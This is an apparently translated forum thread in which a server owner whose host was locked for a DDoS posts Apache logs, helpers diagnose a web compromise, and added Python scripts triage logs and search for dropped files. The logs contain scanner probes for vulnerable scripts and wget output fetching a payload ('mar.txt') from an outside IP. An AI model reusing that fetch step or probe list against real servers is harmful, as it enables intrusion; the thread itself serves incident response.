DoS attack / server locked

elzschiko

New Member
Hello,

I have a root server at 1und1, and yesterday morning (Saturday) it was locked, with the justification that it had launched a DDoS attack against another server.
After several phone calls the server was unlocked for me again in rescue mode.
While analysing the log files I came across something in the Apache2 error.log that puzzled me. Can anyone help me interpret it and fix the problem?
I ran RKHunter; it found no rootkits.

Code:
[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/b2evo
[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/wordpress
[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/phpgroupware
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/awstats.pl
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats.pl
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/awstats
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/cgi
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scripts
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/stats
[Thu Feb 15 23:09:48 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:48 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/stats
[Fri Feb 16 01:29:13 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/a1b2c3d4e5f6g7h8i9
[Fri Feb 16 01:29:13 2007] [error] [client 82.216.202.246] script '/srv/www/vhosts/default/htdocs/adxmlrpc.php' not found or unable to stat
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/adserver
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpAdsNew
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpadsnew
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpads
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/Ads
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/ads
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] script '/srv/www/vhosts/default/htdocs/xmlrpc.php' not found or unable to stat
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/xmlrpc
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/xmlsrv
[Fri Feb 16 01:29:17 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/blog
[Fri Feb 16 01:29:17 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/drupal
[Fri Feb 16 01:29:19 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/community
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
perl: no process killed
--02:29:40--  http://80.15.6.81/mar.txt
           => `mar.txt'
Connecting to 80.15.6.81:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,668 (29K) [text/plain]

    0K .......... .......... ........                        100%   17.08 KB/s

02:29:42 (17.08 KB/s) - `mar.txt' saved [29668/29668]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  3 29668    3  1188    0     0   5582      0  0:00:05 --:--:--  0:00:05  5582  8 29668    8  2628    0     0   8850      0  0:00:03 --:--:--  0:00:03 16941
67 29668   67 19908    0     0  15049      0  0:00:01  0:00:01 --:--:-- 16864100 29668  100 29668    0     0  15547      0  0:00:01  0:00:01 --:--:-- 16792
[Fri Feb 16 02:46:08 2007] [error] [client 207.46.98.133] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt
[Fri Feb 16 02:46:08 2007] [error] [client 207.46.98.133] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt
[Fri Feb 16 02:46:09 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 02:46:09 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 03:03:00 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 04:11:05 2007] [error] [client 207.46.98.134] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt

Many thanks in advance
Daniel
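One thing worth pointing out about the excerpt above: the `sh: ...`, `perl: ...` and wget/curl lines are not Apache log lines at all. Apache passes the stderr of its CGI/PHP child processes into error_log, so shell and downloader chatter landing there means commands were executed under the web server's user, and the Apache-formatted lines immediately before and after that block bound the time window to look at in access_log. The following is an added example (not code from the original post) that splits an error_log into Apache lines and "foreign" lines, pulls out any download URLs, counts the 404 probes per client, and reports that window. The sample log is constructed from the excerpt in the post; the function and variable names are my own.

```python
import re
from typing import Dict, List, Optional, Tuple

# Apache 2.0/2.2 error_log line: "[date] [level] [client ip] message"
# (the "[client ip]" part is absent for server-level messages).
APACHE_ERR_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?:\[client (?P<ip>[^\]]+)\] )?(?P<msg>.*)$"
)
URL_RE = re.compile(r"https?://[^\s'\"`]+")
PATH_RE = re.compile(r"(/[^\s']+)")

# Constructed sample modelled on the excerpt in the post above (not the full log).
SAMPLE_ERROR_LOG = """\
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/awstats.pl
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats.pl
sh: /id: No such file or directory
perl: no process killed
--02:29:40--  http://80.15.6.81/mar.txt
           => `mar.txt'
02:29:42 (17.08 KB/s) - `mar.txt' saved [29668/29668]
sh: fetch: command not found
[Fri Feb 16 02:46:08 2007] [error] [client 207.46.98.133] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt
"""


def triage_error_log(text: str) -> dict:
    """Split an error_log into Apache-formatted lines and 'foreign' lines.

    Foreign lines are anything without the Apache timestamp prefix. Apache
    hands the stderr of its CGI/PHP children to error_log, so shell and
    wget/curl output there means a command ran under the web server's user.
    The Apache lines around the foreign block bound the window to search
    in access_log: (last Apache timestamp before, first Apache timestamp after).
    """
    apache_lines = 0
    foreign: List[str] = []
    urls: List[str] = []
    probes_by_client: Dict[str, int] = {}
    probe_paths: List[str] = []
    last_ts: Optional[str] = None
    window: Optional[Tuple[Optional[str], Optional[str]]] = None

    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = APACHE_ERR_RE.match(line)
        if m is None:
            if not foreign:                 # first foreign line opens the window
                window = (last_ts, None)
            foreign.append(line)
            urls.extend(URL_RE.findall(line))
            continue
        apache_lines += 1
        last_ts = m.group("ts")
        if foreign and window is not None and window[1] is None:
            window = (window[0], last_ts)   # first Apache line after the block closes it
        msg = m.group("msg")
        if "does not exist" in msg or "not found or unable to stat" in msg:
            ip = m.group("ip") or "-"
            probes_by_client[ip] = probes_by_client.get(ip, 0) + 1
            p = PATH_RE.search(msg)
            if p:
                probe_paths.append(p.group(1))

    return {
        "apache_lines": apache_lines,
        "foreign_lines": foreign,
        "urls": urls,
        "window": window,
        "probes_by_client": probes_by_client,
        "probe_paths": probe_paths,
    }


if __name__ == "__main__":
    report = triage_error_log(SAMPLE_ERROR_LOG)
    print(f"{report['apache_lines']} Apache lines, {len(report['foreign_lines'])} foreign lines")
    print("foreign output seen between", report["window"])
    print("download URLs in foreign output:", report["urls"])
    print("404 probes per client:", report["probes_by_client"])
```

Run against the real error_log, the `window` value is what to grep for in access_log: the request that triggered the download is the one logged for the web server in that interval, usually with a status other than 404.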
 
Hello!

Well, I would say someone scanned your server for possible security holes and then found one. He used it to upload malicious code to your server and execute it.

Regards, flyingoffice
 
Thanks for the quick reply.
That's what I thought. Do you have any tips on how to find out which hole he used? Since this came in via Apache, it should be possible somehow to find out which script let him do it?

Regards
Daniel
 
Hello!

Not at first glance. Try searching for the file mar.txt that was uploaded to your server. I suspect it was put into the same directory where your script with the security hole is.

Regards, flyingoffice
 
Hello,

I've already done that, but found nothing. Does "find" also find hidden files?
Can you tell which script the attack came through?


Regards
Daniel
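On the hidden-files question: find(1) does not treat a leading dot specially, so a dot-file is listed like any other name, and neither does Python's os.walk. What is more useful than searching for one file name is sweeping the document root plus the world-writable directories a web-server user can always write to (/tmp, /var/tmp, /dev/shm) for anything modified inside the time window the logs give you, since a dropped file is easy to rename. The following is an added example, not code from the thread: the root directories are assumptions for a host like the one described, and the demo tree it builds is a constructed fixture.

```python
import os
import stat
import tempfile
import time
from typing import List, Tuple

# Directories worth sweeping after a web compromise: the document root and the
# world-writable locations a web-server user can always write to.
# The web-root path is an assumption; adjust it to the host.
DEFAULT_ROOTS = ["/srv/www", "/tmp", "/var/tmp", "/dev/shm"]


def recently_modified(roots: List[str], newer_than: float, older_than: float) -> List[Tuple[str, float]]:
    """Return (path, mtime) for every regular file under `roots` whose mtime
    lies in [newer_than, older_than], oldest first. Dot-files are walked like
    any other name. Symlinks are skipped so a planted link cannot point the
    sweep outside the tree."""
    found = []
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue                      # vanished or unreadable; move on
                if not stat.S_ISREG(st.st_mode):
                    continue
                if newer_than <= st.st_mtime <= older_than:
                    found.append((full, st.st_mtime))
    return sorted(found, key=lambda item: item[1])


def build_demo_tree() -> str:
    """Constructed fixture: a web-root lookalike with one month-old file and one
    hidden, freshly written file (a stand-in for a dropped script)."""
    base = tempfile.mkdtemp(prefix="webroot-")
    old = os.path.join(base, "htdocs", "index.html")
    os.makedirs(os.path.dirname(old))
    with open(old, "w") as fh:
        fh.write("<html></html>\n")
    month_ago = time.time() - 30 * 86400
    os.utime(old, (month_ago, month_ago))
    hidden = os.path.join(base, "htdocs", "images", ".dropped.txt")
    os.makedirs(os.path.dirname(hidden))
    with open(hidden, "w") as fh:
        fh.write("# constructed placeholder, not the real dropped file\n")
    return base


def demo() -> List[str]:
    """Sweep the fixture for files touched in the last hour; returns base names."""
    base = build_demo_tree()
    now = time.time()
    hits = recently_modified([base], now - 3600, now + 60)
    return [os.path.basename(path) for path, _ in hits]


if __name__ == "__main__":
    print("fixture sweep:", demo())
    # On a real host: bound the window with the timestamps from the logs.
    now = time.time()
    for path, mtime in recently_modified(DEFAULT_ROOTS, now - 7 * 86400, now):
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime)), path)
```

Run it from the rescue system against the mounted disk rather than from the possibly compromised installation, and narrow the window to the interval between the last normal Apache line and the first foreign shell output in error.log.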
 
Hello!

Can you tell which script the attack came through?

No, otherwise I would of course have told you long ago. After all, that is an excerpt from the error.log. An excerpt from the access.log for the same period would certainly be interesting.

Regards, flyingoffice
 
Hello.
Via mar.txt. That was the script. A nice script. I had a look at it. Take a look at http://twidle.atrix-team.org . Because they have something to do with your script. Because their name appears in the script. I can't tell you more than that. Because you can't think well with such a hangover.

See you.
 
OK,

here is the excerpt from the log file:

Code:
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //drupal/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //community/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //blogs/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //wordpress/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //phpgroupware/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:45 +0100] "GET //awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:45 +0100] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //scgi-bin/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //scgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //cgi/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scgi/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scripts/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //cgi-bin/stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:48 +0100] "GET //scgi-bin/stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:48 +0100] "GET //stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
195.136.80.67 - - [15/Feb/2007:23:43:20 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.136.80.67 - - [15/Feb/2007:23:43:27 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.136.80.67 - - [15/Feb/2007:23:43:28 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
72.14.220.136 - - [15/Feb/2007:23:55:51 +0100] "GET /index.php?bereich=collection&seite=1&unterseite=11 HTTP/1.0" 301 388 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"
83.133.125.202 - - [16/Feb/2007:00:07:53 +0100] "GET / HTTP/1.1" 301 336 "http://www.ottosuch.de/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)"
84.19.187.129 - - [16/Feb/2007:01:07:07 +0100] "GET / HTTP/1.0" 200 266 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:13 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:13 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:17 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:17 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:19 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
207.46.98.133 - - [16/Feb/2007:02:46:08 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:08 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:09 +0100] "GET /index.php?nav1=contact&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:09 +0100] "GET /index.php?nav1=referenzen&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:03:03:00 +0100] "GET /index.php?nav1=schreib&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
87.118.105.74 - - [16/Feb/2007:03:25:25 +0100] "GET / HTTP/1.0" 200 266 "-" "-"
207.46.98.134 - - [16/Feb/2007:04:11:05 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.134 - - [16/Feb/2007:04:11:06 +0100] "GET /index.php?nav1=buero&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.135 - - [16/Feb/2007:05:58:14 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.135 - - [16/Feb/2007:05:58:15 +0100] "GET /index.php?nav1=kurier&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:06:27:20 +0100] "GET /index.php HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
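What the access_log excerpt above shows is two clients (66.70.213.90 and 82.216.202.246) walking through lists of well-known script locations (xmlrpc.php, adxmlrpc.php, awstats.pl), every one of them answered with 404. That is the scanner's reconnaissance, not the successful request; the line to chase is a request to one of those script names that got something other than a 404 in the window bounded by the error.log. The following is an added example, not code from the thread, that parses combined-format access_log lines, groups them per client, flags clients that probed several known script locations, and separates the probes that actually reached a script. The sample log is constructed: the first seven lines are modelled on the post's excerpt, and the last line (TEST-NET address 192.0.2.10) is invented to show how a hit would stand out. The probe list and all names are my own.

```python
import re
from datetime import datetime
from typing import Dict, List, Tuple

# Apache "combined" access_log line.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Script names the scanners in the post went after; extend this list as needed.
PROBE_SCRIPTS = {"xmlrpc.php", "adxmlrpc.php", "awstats.pl"}

# Constructed sample: lines 1-7 modelled on the post's access_log, line 8 invented
# (TEST-NET address) to show a probe that reaches a script. Not the poster's log.
SAMPLE_ACCESS_LOG = """\
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //drupal/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //wordpress/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:45 +0100] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.216.202.246 - - [16/Feb/2007:01:29:13 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
207.46.98.133 - - [16/Feb/2007:02:46:08 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:09 +0100] "GET /index.php?nav1=contact&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
192.0.2.10 - - [16/Feb/2007:02:29:30 +0100] "POST /cgi-bin/awstats.pl HTTP/1.0" 200 512 "-" "-"
"""


def is_probe(path: str) -> bool:
    """True when the request targets a known probe script (query string ignored)."""
    script = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return script in PROBE_SCRIPTS


def summarize_clients(text: str, min_probe_paths: int = 2) -> Dict[str, dict]:
    """Group requests per client; flag scanners and record probes that got a non-error status."""
    clients: Dict[str, dict] = {}
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m is None:
            continue            # other format, or a line truncated by terminal wrapping
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        status = int(m.group("status"))
        path = m.group("path")
        c = clients.setdefault(m.group("ip"), {
            "requests": 0, "not_found": 0, "probe_paths": set(), "probe_hits": [],
            "first": ts, "last": ts, "user_agent": m.group("ua"),
        })
        c["requests"] += 1
        c["first"] = min(c["first"], ts)
        c["last"] = max(c["last"], ts)
        if status == 404:
            c["not_found"] += 1
        if is_probe(path):
            c["probe_paths"].add(path)
            if status < 400:    # the probe found something: this is the line to chase
                c["probe_hits"].append((m.group("ts"), m.group("method"), path, status))
    for c in clients.values():
        c["span_seconds"] = int((c["last"] - c["first"]).total_seconds())
        # A crawler hitting 404s on normal pages (msnbot above) is not a scanner;
        # requiring several distinct probe-script paths keeps it out of the list.
        c["scanner"] = len(c["probe_paths"]) >= min_probe_paths
    return clients


def successful_probe_hits(clients: Dict[str, dict]) -> List[Tuple[str, str, str, str, int]]:
    """Flatten probe hits across all clients: (ip, timestamp, method, path, status)."""
    hits = []
    for ip, c in clients.items():
        for ts, method, path, status in c["probe_hits"]:
            hits.append((ip, ts, method, path, status))
    return hits


if __name__ == "__main__":
    summary = summarize_clients(SAMPLE_ACCESS_LOG)
    for ip, c in summary.items():
        tag = "SCANNER" if c["scanner"] else "       "
        print(f"{tag} {ip:15} {c['requests']:3} req {c['not_found']:3} x404 "
              f"{len(c['probe_paths'])} probe paths in {c['span_seconds']}s  {c['user_agent']}")
    print("probes that reached a script:", successful_probe_hits(summary))
```

On a real log, feed it the whole file rather than an excerpt: the scanner's hit may come from a third address, minutes or days after the 404 sweep, and the `successful_probe_hits` list is short enough to check by hand.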
 
So.
I had another look at it. I think I know how it happened.

1. The attacker had shell access. Maybe the password was too weak.
2. The attacker started a script.
3. But that was already some time ago, since the person had probably hacked several servers and only launched the DoS later, once all the servers were prepared.
4. A script established a connection to Atrix Team, from all the servers.
5. From there all the servers were controlled via the "service"^^ MyBox on the Atrix Team site.
 
Hello,

so, the server has been reinstalled.
rkhunter gives me the following warnings:

Code:
Application advisories
* Application scan
   Checking Apache2 modules ...                               [ Not found ]
   Checking Apache configuration ...                          [ OK ]

* Application version scan
   - GnuPG                                               [ Vulnerable ]
   - Bind DNS                                            [ OK ]
   - OpenSSL                                            [ Vulnerable ]
   - PHP                                               [ Vulnerable ]
   - Procmail MTA                                         [ OK ]
   - ProFTPd                                            [ OK ]
   - OpenSSH                                             [ OK ]



Security advisories
* Check: Groups and Accounts
   Searching for /etc/passwd...                               [ Found ]
   Checking users with UID '0' (root)...                      [ OK ]

* Check: SSH
   Searching for sshd_config...
   Found /etc/ssh/sshd_config
   Checking for allowed root login...                         [ OK (Remote root login disabled) ]
   Checking for allowed protocols...                          [ OK (Only SSH2 allowed) ]

* Check: Events and Logging
   Search for syslog configuration...                         [ OK ]
   Checking for running syslog slave...                       [ OK ]
   Checking for logging to remote system...                   [ OK (no remote logging) ]

[Press <ENTER> to continue]



---------------------------- Scan results ----------------------------

MD5 scan
Scanned files: 0
Incorrect MD5 checksums: 0

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 3

Scanning took 73 seconds

Can anyone help me update php, gnupg and openssl to a more secure version?

I have a root server from 1und1, SuSE 9.3 64-bit; Plesk 8.1.0


Thanks
Daniel
 
Unfortunately I don't know how up to date the packages are, but have you already tried updating via YaST? If not, just recompile the packages yourself.
 
I have already run the online update. Can the state that YaST offers be considered "reasonably" secure? I'd be happy to send you the version numbers of the flagged programs by PM.
 